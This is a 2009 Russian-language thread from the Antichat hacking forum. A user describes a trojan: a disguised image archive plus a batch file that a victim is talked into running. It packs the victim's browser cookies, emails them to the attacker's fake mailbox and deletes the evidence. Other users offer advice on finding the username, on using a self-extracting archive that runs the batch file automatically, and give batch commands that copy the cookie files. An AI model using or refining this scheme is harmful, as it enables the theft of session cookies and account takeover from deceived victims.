Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Проблема с добычей кукишей (https://forum.antichat.xyz/showthread.php?t=117528)

MaraZZmatiK 24.04.2009 15:08

Проблема с добычей кукишей
 
Проблема следующая.
Решил добыть куки.

Сделал так:
создал rarjpeg, который содержит: ещё одну картинку для отвода глаз, консольный мейл-клиент

Придумалось сделать следующим образом:
человеку выдаётся рарджпег с предлогом "хочешь фокус покажу?". К нему прилагается консольный рар и батник, который предлагается запуcтить.

По запуску, батник распаковывает рарджпег, архивит кукиши, шлёт их почтой мне на фейковый мыльничек, удаляет все файлы кроме второй картинки.

Все шаги проходят идеальнор (файрвола нет), НО!
Неизвестно имя пользователя, чтобы попасть в папку кукишей текущего пользователя.

Есть ли какое-нибудь решение, чтобы имя пользователя добыть?

Sn@k3 24.04.2009 15:17

кукисы чего?

MaraZZmatiK 24.04.2009 15:19

Стандартные из C:\documents and settings\username\cookies\

rubik-nerubik 24.04.2009 15:21

можешь подробнее описать? т.е. в конечном счете что получиться файл с иконкой бат и расширением бат? ты его открываешь и потом тупо открывается и картинка и архив?

Sn@k3 24.04.2009 15:26

Цитата:

Сообщение от MaraZZmatiK
Стандартные из C:\documents and settings\username\cookies\

путём реестра, там обычно сохраняется) имя юзера)

MaraZZmatiK 24.04.2009 15:32

rubik-nerubik: rarjpg = картинка jpg (png, gif), в конец текста которой дописан rar файл.
Посмотри на lurkmore.ru - там написано про технологию эту.

Sn@k3: а путь не подскажешь? :)

rushter 24.04.2009 15:43

тс забудь об этом у тебя ничего не выйдет

MaraZZmatiK 24.04.2009 16:21

А почему?

Fepsis 24.04.2009 20:50

Засовывай картинку и батник в самораспаковывающийся архив, указывай апсолютный путь для распаковки %userprofile% и ставь на выполнение после распаковки свой батник...

если всё-таки по-своему хочешь сделать, поставь вначале батника

Код:

cd %userprofile%
Вот пример скрипта копирующего все куки в C:\1.txt...
Код:

cd %userprofile%
copy  Cookies\*.txt c:\1.txt



Время: 16:49